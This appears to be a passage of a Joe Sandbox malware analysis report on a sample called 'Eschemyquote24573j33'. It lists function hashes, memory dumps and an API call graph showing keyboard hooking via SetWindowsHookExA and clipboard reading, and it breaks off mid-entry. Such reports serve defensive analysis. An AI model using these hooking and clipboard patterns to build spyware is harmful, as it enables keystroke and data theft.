                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0275B33E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: a1453f6332659a20383bb342c99bf73cbd16fae669401514fa0fa115b4d75f8a
                                            • Instruction ID: 6806b7d62dd788445b2d2b6c5e98a6316e6086516270cc41df9fe8b5815ba7af
                                            • Opcode Fuzzy Hash: a1453f6332659a20383bb342c99bf73cbd16fae669401514fa0fa115b4d75f8a
                                            • Instruction Fuzzy Hash: E11110B6C002498FDB10CF9AD444AEEFBF4EF88314F10846AD919B7244C3B9A545CFA1
                                            Function 025CD01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067380870.00000000025CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_25cd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9741042fa7beec76e3b07dec5ce2f007af7cbfc47569c592e45e58bba9c565bc
                                            • Instruction ID: 459851b128a6fcf8202f0746506f2ab29aa63338d0cdcf32b4e7ecee82bd8b1a
                                            • Opcode Fuzzy Hash: 9741042fa7beec76e3b07dec5ce2f007af7cbfc47569c592e45e58bba9c565bc
                                            • Instruction Fuzzy Hash: C221F1755042049FDB14DF68D580B26BFA5FB84324F30C97DD80A9B256E33AD406CA61
                                            Function 025CD1D4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067380870.00000000025CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_25cd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 924a480c252b47dc1898f7f3729273b858926e41df8845343bb60ee7a4137f03
                                            • Instruction ID: 43bf1b46320032ed602a96e03ece515bd8863ef353d9cf16a76063a66acf9dc8
                                            • Opcode Fuzzy Hash: 924a480c252b47dc1898f7f3729273b858926e41df8845343bb60ee7a4137f03
                                            • Instruction Fuzzy Hash: 7321D071504204AFDB05DFA4D980B26BFB5FB88314F30C97DE94A8B25AD33AD406CA65
                                            Function 025CD006 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067380870.00000000025CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_25cd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 913d98701fdeb9ba9c91452c20ab8112548e93a15ea8d44e5bd66a818bfc9a2f
                                            • Instruction ID: 48f57f8b0884816893b26d76a841f71ad872b885d88653fc8a737e394c37ce2d
                                            • Opcode Fuzzy Hash: 913d98701fdeb9ba9c91452c20ab8112548e93a15ea8d44e5bd66a818bfc9a2f
                                            • Instruction Fuzzy Hash: CF2180755093808FCB12CF24D594715BF71FB46214F28C5EED8898B6A7D33A940ACB62
                                            Function 025CD1CF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067380870.00000000025CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025CD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_25cd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: b22d24e31d0535d0dfd31296cdbf54c5fa650b48852ba092c9795b1f1295415b
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: D611BB76504280DFCB02CF50C9C4B15BFB1FB84214F24C6AED8498B29AC33AD40ACB62
                                            Function 025BD745 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067250666.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_25bd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 62b04f93938b4a214b97b2ca7eeeaf5be4a1612e1d523ddc92058efea07534f9
                                            • Instruction ID: 82aaeb0b84a1d86aff9edda9a41b16536bae2c96c0024c93e35188ef1ca0134b
                                            • Opcode Fuzzy Hash: 62b04f93938b4a214b97b2ca7eeeaf5be4a1612e1d523ddc92058efea07534f9
                                            • Instruction Fuzzy Hash: C201A7710063449AE7219B25CD84BE6BFACFF45324F18C96AED090A686D37D9841CAB9
                                            Function 025BD744 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067250666.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_25bd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 06e9309341eb78ea6eac99a50c5f782a0cc4b1abf8767b9840b8ec3dcff538ca
                                            • Instruction ID: 8f3185c20dab23dbff3a035c5550707aa532960d8862b21af4ada092f3ae3477
                                            • Opcode Fuzzy Hash: 06e9309341eb78ea6eac99a50c5f782a0cc4b1abf8767b9840b8ec3dcff538ca
                                            • Instruction Fuzzy Hash: 96F09671405344AEE7218F16CC88BA2FFA8FF45734F18C55AED484B686C3799844CBB5

                                            Non-executed Functions

                                            Function 06F8C2A8 Relevance: .4, Instructions: 378COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 47a4e44f2c57b94f05ae3580dc585a98761d071ea9c1c06537c6bc284c7e701d
                                            • Instruction ID: fe363d12edc9b93aabad499be15c09ed692130f3aa40cad1a10c9b355ee0b943
                                            • Opcode Fuzzy Hash: 47a4e44f2c57b94f05ae3580dc585a98761d071ea9c1c06537c6bc284c7e701d
                                            • Instruction Fuzzy Hash: CAD19C31B017148FDB69EB79C854B6EB7E7AF89700F1444ADD14A8B3A0DB35E901CB61
                                            Function 06F86CB0 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b1860d91ae07cf958d5ff462966d6d7125e390da39476a08e7ca87da5bf4fc32
                                            • Instruction ID: 60c120039b68c3d6dd5ebf9721a81eac85036b8088b77ff2f3d991e42611a63e
                                            • Opcode Fuzzy Hash: b1860d91ae07cf958d5ff462966d6d7125e390da39476a08e7ca87da5bf4fc32
                                            • Instruction Fuzzy Hash: CBE11A74E041198FCB14EFA9C9809AEFBB2FF89305F24C169D415AB356D731A981CF61
                                            Function 06F84D30 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3416be1e7f1f9b3e6b2ba99e4d426a8d3269018f68bc145152d7f3e4e64519f1
                                            • Instruction ID: 3f9dd8a5f4a6e19fb895efab623ac00624f321a78cb99cb1c853066e88f42298
                                            • Opcode Fuzzy Hash: 3416be1e7f1f9b3e6b2ba99e4d426a8d3269018f68bc145152d7f3e4e64519f1
                                            • Instruction Fuzzy Hash: 42E10874E001198FCB54DFA9C9809AEFBF2BF89305F24C1A9D415AB356D731A941CFA1
                                            Function 06F848F8 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 019cfbf70fc6ae87ebd2fbbf85861690be5f4498fa5ffe7b19bfd78180cdf14d
                                            • Instruction ID: 102cb7efc5b98348b402586d5c1d0c85067588dc825915ff760cb0a60d2b0de7
                                            • Opcode Fuzzy Hash: 019cfbf70fc6ae87ebd2fbbf85861690be5f4498fa5ffe7b19bfd78180cdf14d
                                            • Instruction Fuzzy Hash: 06E1F774E0411A8FDB14DFA8C5809AEFBF2FF89305F24816AD415AB35AD731A941CFA1
                                            Function 06F871C0 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e26b75c0869bd00699ab13d1710b513493b37455d9aba09f54225241fa14b42c
                                            • Instruction ID: f1ea19104217a9c16692d203e050b2dffd63105c632c6bb418264eec3f46a078
                                            • Opcode Fuzzy Hash: e26b75c0869bd00699ab13d1710b513493b37455d9aba09f54225241fa14b42c
                                            • Instruction Fuzzy Hash: 2DE1FA74E041198FCB54EFA9C580AAEFBB2BF89305F24C169D815AB356D730AD41CF61
                                            Function 06F85168 Relevance: .3, Instructions: 312COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a82c6965ab7a2110bb19d57e2234a729012972f491403d287bb413b2c1077aba
                                            • Instruction ID: 42844071724ce359c01d302950d5ec4f2a181e1dec9b83a333f34cbf5657e47f
                                            • Opcode Fuzzy Hash: a82c6965ab7a2110bb19d57e2234a729012972f491403d287bb413b2c1077aba
                                            • Instruction Fuzzy Hash: 2BE1F874E042198FCB54DFA9C5809AEFBB2FF89305F24C1A9D415AB356D730A981CFA1
                                            Function 0275DEEC Relevance: .3, Instructions: 264COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2067704157.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2750000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 989a565f718ca656699f8ea36ee6a4045d8a986d3bfe8ca966a01610485a7474
                                            • Instruction ID: 57d4a4292fd5658acf03cc5c97fe3252ce43ad85d71de3ee44f1a29b244653d8
                                            • Opcode Fuzzy Hash: 989a565f718ca656699f8ea36ee6a4045d8a986d3bfe8ca966a01610485a7474
                                            • Instruction Fuzzy Hash: C4A18B36E002298FCF15DFA4C84459EF7B2FF8A304B15456AE815AB2A4DBB1D916CB40
                                            Function 06F848E0 Relevance: .1, Instructions: 143COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071900725.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f80000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3e12446f5e39c33f23019066a709d6e9e299d386a6f60b452cfa54f9c7079b18
                                            • Instruction ID: b4d9328e23b921c88eee9111accd7ae261c281c9c1798a04c3f6f74ef8a32c61
                                            • Opcode Fuzzy Hash: 3e12446f5e39c33f23019066a709d6e9e299d386a6f60b452cfa54f9c7079b18
                                            • Instruction Fuzzy Hash: E0515074E052198FCB14DFA9C9805AEFBF6FF89304F24C1AAD414AB216C7319941CFA1

                                            Execution Graph

                                            Execution Coverage:11.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:1.4%
                                            Total number of Nodes:220
                                            Total number of Limit Nodes:25
                                            execution_graph 25148 32b0848 25150 32b084e 25148->25150 25149 32b091b 25150->25149 25152 32b1380 25150->25152 25154 32b138b 25152->25154 25153 32b1490 25153->25150 25154->25153 25159 693fbc0 25154->25159 25165 693fbaf 25154->25165 25171 69358e3 25154->25171 25177 69358f8 25154->25177 25160 693fbc8 25159->25160 25161 693fc0d 25160->25161 25183 693fca2 25160->25183 25187 693fc20 25160->25187 25191 693fc10 25160->25191 25161->25154 25166 693fbc8 25165->25166 25167 693fc0d 25166->25167 25168 693fca2 SetWindowsHookExA 25166->25168 25169 693fc10 SetWindowsHookExA 25166->25169 25170 693fc20 SetWindowsHookExA 25166->25170 25167->25154 25168->25166 25169->25166 25170->25166 25172 693590a 25171->25172 25176 69359bb 25172->25176 25199 69307b4 25172->25199 25174 6935981 25204 69307d4 25174->25204 25176->25154 25178 693590a 25177->25178 25179 69307b4 GetModuleHandleW 25178->25179 25181 69359bb 25178->25181 25180 6935981 25179->25180 25182 69307d4 KiUserCallbackDispatcher 25180->25182 25181->25154 25182->25181 25185 693fc5d 25183->25185 25184 693fca0 25184->25160 25185->25184 25195 693ee20 25185->25195 25189 693fc3d 25187->25189 25188 693ee20 SetWindowsHookExA 25188->25189 25189->25188 25190 693fca0 25189->25190 25190->25160 25193 693fc1e 25191->25193 25192 693fca0 25192->25160 25193->25192 25194 693ee20 SetWindowsHookExA 25193->25194 25194->25193 25196 693fe28 SetWindowsHookExA 25195->25196 25198 693feb2 25196->25198 25198->25185 25200 69307bf 25199->25200 25208 6936ea9 25200->25208 25218 6936eb8 25200->25218 25201 6935f62 25201->25174 25205 69307df 25204->25205 25207 693d8b3 25205->25207 25264 693c304 25205->25264 25207->25176 25209 6936ee3 25208->25209 25228 6935e0c 25209->25228 25212 6936f66 25214 6936f92 25212->25214 25244 6935e1c 25212->25244 25217 6935e0c GetModuleHandleW 25217->25212 25219 6936ee3 25218->25219 25220 6935e0c GetModuleHandleW 25219->25220 25221 6936f4a 25220->25221 25225 6937440 GetModuleHandleW 25221->25225 25226 6937390 GetModuleHandleW 25221->25226 25227 6935e0c GetModuleHandleW 25221->25227 25222 6936f66 25223 6935e1c GetModuleHandleW 25222->25223 25224 6936f92 25222->25224 25223->25224 25225->25222 25226->25222 25227->25222 25229 6935e17 25228->25229 25230 6936f4a 25229->25230 25248 693769e 25229->25248 25256 693760f 25229->25256 25230->25217 25233 6937440 25230->25233 25238 6937390 25230->25238 25234 693746d 25233->25234 25235 69374ee 25234->25235 25236 693760f GetModuleHandleW 25234->25236 25237 693769e GetModuleHandleW 25234->25237 25236->25235 25237->25235 25239 69373ab 25238->25239 25240 69373af 25238->25240 25239->25212 25241 69374ee 25240->25241 25242 693760f GetModuleHandleW 25240->25242 25243 693769e GetModuleHandleW 25240->25243 25242->25241 25243->25241 25245 69378f0 GetModuleHandleW 25244->25245 25247 6937965 25245->25247 25247->25214 25249 69376d7 25248->25249 25250 6935e1c GetModuleHandleW 25249->25250 25251 693773a 25250->25251 25252 69377b4 25251->25252 25253 6935e1c GetModuleHandleW 25251->25253 25252->25230 25254 6937788 25253->25254 25254->25252 25255 6935e1c GetModuleHandleW 25254->25255 25255->25252 25257 693761a 25256->25257 25258 6935e1c GetModuleHandleW 25257->25258 25259 693773a 25258->25259 25260 6935e1c GetModuleHandleW 25259->25260 25263 69377b4 25259->25263 25261 6937788 25260->25261 25262 6935e1c GetModuleHandleW 25261->25262 25261->25263 25262->25263 25263->25230 25265 693d8c8 KiUserCallbackDispatcher 25264->25265 25267 693d936 25265->25267 25267->25205 25274 32b7258 25275 32b729e DeleteFileW 25274->25275 25277 32b72d7 25275->25277 25278 693e140 25279 693e14b 25278->25279 25280 693e15b 25279->25280 25282 693dbb0 25279->25282 25283 693e190 OleInitialize 25282->25283 25284 693e1f4 25283->25284 25284->25280 25285 1abd01c 25286 1abd034 25285->25286 25287 1abd08e 25286->25287 25294 6938b42 25286->25294 25300 6936c4c 25286->25300 25308 6936c3c 25286->25308 25312 6936c25 25286->25312 25316 6938b50 25286->25316 25322 693d2d2 25286->25322 25295 6938b76 25294->25295 25296 6936c3c GetModuleHandleW 25295->25296 25297 6938b82 25296->25297 25298 6936c4c 2 API calls 25297->25298 25299 6938b97 25298->25299 25299->25287 25301 6936c57 25300->25301 25302 693d361 25301->25302 25304 693d351 25301->25304 25342 693c2ac 25302->25342 25330 693d488 25304->25330 25336 693d478 25304->25336 25305 693d35f 25309 6936c47 25308->25309 25405 6936c74 25309->25405 25311 6938c87 25311->25287 25313 6936c35 25312->25313 25314 6936c74 GetModuleHandleW 25313->25314 25315 6938c87 25314->25315 25315->25287 25317 6938b76 25316->25317 25318 6936c3c GetModuleHandleW 25317->25318 25319 6938b82 25318->25319 25320 6936c4c 2 API calls 25319->25320 25321 6938b97 25320->25321 25321->25287 25323 693d2da 25322->25323 25324 693d361 25323->25324 25325 693d351 25323->25325 25326 693c2ac 2 API calls 25324->25326 25328 693d488 2 API calls 25325->25328 25329 693d478 2 API calls 25325->25329 25327 693d35f 25326->25327 25328->25327 25329->25327 25332 693d496 25330->25332 25331 693c2ac 2 API calls 25331->25332 25332->25331 25333 693d56e 25332->25333 25349 693d968 25332->25349 25354 693d958 25332->25354 25333->25305 25338 693d496 25336->25338 25337 693c2ac 2 API calls 25337->25338 25338->25337 25339 693d56e 25338->25339 25340 693d958 OleGetClipboard 25338->25340 25341 693d968 OleGetClipboard 25338->25341 25339->25305 25340->25338 25341->25338 25343 693c2b7 25342->25343 25344 693d674 25343->25344 25345 693d5ca 25343->25345 25346 6936c4c OleGetClipboard 25344->25346 25347 693d622 CallWindowProcW 25345->25347 25348 693d5d1 25345->25348 25346->25348 25347->25348 25348->25305 25350 693d987 25349->25350 25351 693da20 25350->25351 25359 693df20 25350->25359 25365 693dedf 25350->25365 25351->25332 25355 693d987 25354->25355 25356 693da20 25355->25356 25357 693df20 OleGetClipboard 25355->25357 25358 693dedf OleGetClipboard 25355->25358 25356->25332 25357->25355 25358->25355 25360 693df28 25359->25360 25361 693df3c 25360->25361 25371 693df58 25360->25371 25382 693df68 25360->25382 25361->25350 25362 693df51 25362->25350 25367 693def5 25365->25367 25366 693df3c 25366->25350 25367->25366 25369 693df58 OleGetClipboard 25367->25369 25370 693df68 OleGetClipboard 25367->25370 25368 693df51 25368->25350 25369->25368 25370->25368 25372 693df68 25371->25372 25373 693df95 25372->25373 25375 693dfd9 25372->25375 25378 693df58 OleGetClipboard 25373->25378 25379 693df68 OleGetClipboard 25373->25379 25374 693df9b 25374->25362 25377 693e059 25375->25377 25393 693e230 25375->25393 25397 693e220 25375->25397 25376 693e077 25376->25362 25377->25362 25378->25374 25379->25374 25383 693df7a 25382->25383 25384 693df95 25383->25384 25386 693dfd9 25383->25386 25389 693df58 OleGetClipboard 25384->25389 25390 693df68 OleGetClipboard 25384->25390 25385 693df9b 25385->25362 25388 693e059 25386->25388 25391 693e230 OleGetClipboard 25386->25391 25392 693e220 OleGetClipboard 25386->25392 25387 693e077 25387->25362 25388->25362 25389->25385 25390->25385 25391->25387 25392->25387 25395 693e245 25393->25395 25396 693e26b 25395->25396 25401 693dcc8 25395->25401 25396->25376 25399 693e230 25397->25399 25398 693dcc8 OleGetClipboard 25398->25399 25399->25398 25400 693e26b 25399->25400 25400->25376 25402 693e2d8 OleGetClipboard 25401->25402 25404 693e372 25402->25404 25406 6936c7f 25405->25406 25407 6935e0c GetModuleHandleW 25406->25407 25408 6938ce9 25407->25408 25409 6935e1c GetModuleHandleW 25408->25409 25410 6938d57 25408->25410 25409->25410 25411 69378ea 25412 6937932 25411->25412 25413 6937938 GetModuleHandleW 25411->25413 25412->25413 25414 6937965 25413->25414 25268 6938998 25269 6938a00 CreateWindowExW 25268->25269 25271 6938abc 25269->25271 25272 693c6f8 DuplicateHandle 25273 693c78e 25272->25273

                                            Executed Functions

                                            Function 0693EE20 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0693FC90,00000000,00000000), ref: 0693FEA3
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: 0053eeba0a98d0d14eb94d52a75bf52c26f8c78ac8b948619c48e8532266331a
                                            • Instruction ID: e15b8f7b1eb8331d5f0d0706a5c0160d203022720613c5571bd4ad0a8d5986c1
                                            • Opcode Fuzzy Hash: 0053eeba0a98d0d14eb94d52a75bf52c26f8c78ac8b948619c48e8532266331a
                                            • Instruction Fuzzy Hash: 382115B5D002199FCB64DF99D844BEEFBF5FB88310F10842AE519A7250D778A944CFA1
                                            Function 06938992 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1428 6938992-69389fe 1429 6938a00-6938a06 1428->1429 1430 6938a09-6938a10 1428->1430 1429->1430 1431 6938a12-6938a18 1430->1431 1432 6938a1b-6938a53 1430->1432 1431->1432 1433 6938a5b-6938aba CreateWindowExW 1432->1433 1434 6938ac3-6938afb 1433->1434 1435 6938abc-6938ac2 1433->1435 1439 6938b08 1434->1439 1440 6938afd-6938b00 1434->1440 1435->1434 1441 6938b09 1439->1441 1440->1439 1441->1441
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06938AAA
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 7c92ece87e0fa426db64a9fb672e625293a2c29c1bb7233615240f4467357f8a
                                            • Instruction ID: cc5ea500273b8a79f11e526a020eb1d57adece6e818d9d5b43277ac552465267
                                            • Opcode Fuzzy Hash: 7c92ece87e0fa426db64a9fb672e625293a2c29c1bb7233615240f4467357f8a
                                            • Instruction Fuzzy Hash: 6351C0B1D103199FDF14CF99C984ADEBBB5BF48310F24852AE419AB250D775A845CF90
                                            Function 06938998 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1442 6938998-69389fe 1443 6938a00-6938a06 1442->1443 1444 6938a09-6938a10 1442->1444 1443->1444 1445 6938a12-6938a18 1444->1445 1446 6938a1b-6938aba CreateWindowExW 1444->1446 1445->1446 1448 6938ac3-6938afb 1446->1448 1449 6938abc-6938ac2 1446->1449 1453 6938b08 1448->1453 1454 6938afd-6938b00 1448->1454 1449->1448 1455 6938b09 1453->1455 1454->1453 1455->1455
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06938AAA
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 58fb3ecff0733ae5ac397a1ab9f5215f847f5651c1666d66c87b5f064b888ccf
                                            • Instruction ID: ae75cedd72269b4ea2d031873a4cf4cfe4276ec08ad2ddd643d0b41813c0a129
                                            • Opcode Fuzzy Hash: 58fb3ecff0733ae5ac397a1ab9f5215f847f5651c1666d66c87b5f064b888ccf
                                            • Instruction Fuzzy Hash: 8A41C0B1D003599FDF14CF9AC984ADEBBB5FF48310F24812AE819AB250D775A845CF90
                                            Function 0693C2AC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1456 693c2ac-693d5c4 1459 693d674-693d694 call 6936c4c 1456->1459 1460 693d5ca-693d5cf 1456->1460 1467 693d697-693d6a4 1459->1467 1462 693d622-693d65a CallWindowProcW 1460->1462 1463 693d5d1-693d608 1460->1463 1465 693d663-693d672 1462->1465 1466 693d65c-693d662 1462->1466 1470 693d611-693d620 1463->1470 1471 693d60a-693d610 1463->1471 1465->1467 1466->1465 1470->1467 1471->1470
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0693D649
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: dc52e54fc5454c8c93c4ff2b6f7e6de7ac414b26f155f227246c451df394a1e0
                                            • Instruction ID: 5274d1ab03d137f011e8bb1a10d8e8cea32967bd7eff10feff720e5960f8ac11
                                            • Opcode Fuzzy Hash: dc52e54fc5454c8c93c4ff2b6f7e6de7ac414b26f155f227246c451df394a1e0
                                            • Instruction Fuzzy Hash: 64414AB4900319CFCB54CF99C488AAABBF9FF88318F24C459D519AB321D335A944CFA0
                                            Function 0693E2CC Relevance: 1.6, APIs: 1, Instructions: 80comclipboardCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1473 693e2cc-693e328 1475 693e332-693e370 OleGetClipboard 1473->1475 1476 693e372-693e378 1475->1476 1477 693e379-693e3c7 1475->1477 1476->1477 1482 693e3d7 1477->1482 1483 693e3c9-693e3cd 1477->1483 1485 693e3d8 1482->1485 1483->1482 1484 693e3cf 1483->1484 1484->1482 1485->1485
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: 361f1762ef91a373200775b53906b3f55551b6fbc25634d9700c75127137e37c
                                            • Instruction ID: b78c2728213cb08017aec03c8b36f9f131605c851826d3a2d77a09368c8be612
                                            • Opcode Fuzzy Hash: 361f1762ef91a373200775b53906b3f55551b6fbc25634d9700c75127137e37c
                                            • Instruction Fuzzy Hash: 883114B0D01359DFDB14DFA9C984BCEBFF5AF48304F24802AE404AB290D7B4A945CBA5
                                            Function 0693DCC8 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1486 693dcc8-693e370 OleGetClipboard 1489 693e372-693e378 1486->1489 1490 693e379-693e3c7 1486->1490 1489->1490 1495 693e3d7 1490->1495 1496 693e3c9-693e3cd 1490->1496 1498 693e3d8 1495->1498 1496->1495 1497 693e3cf 1496->1497 1497->1495 1498->1498
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Clipboard
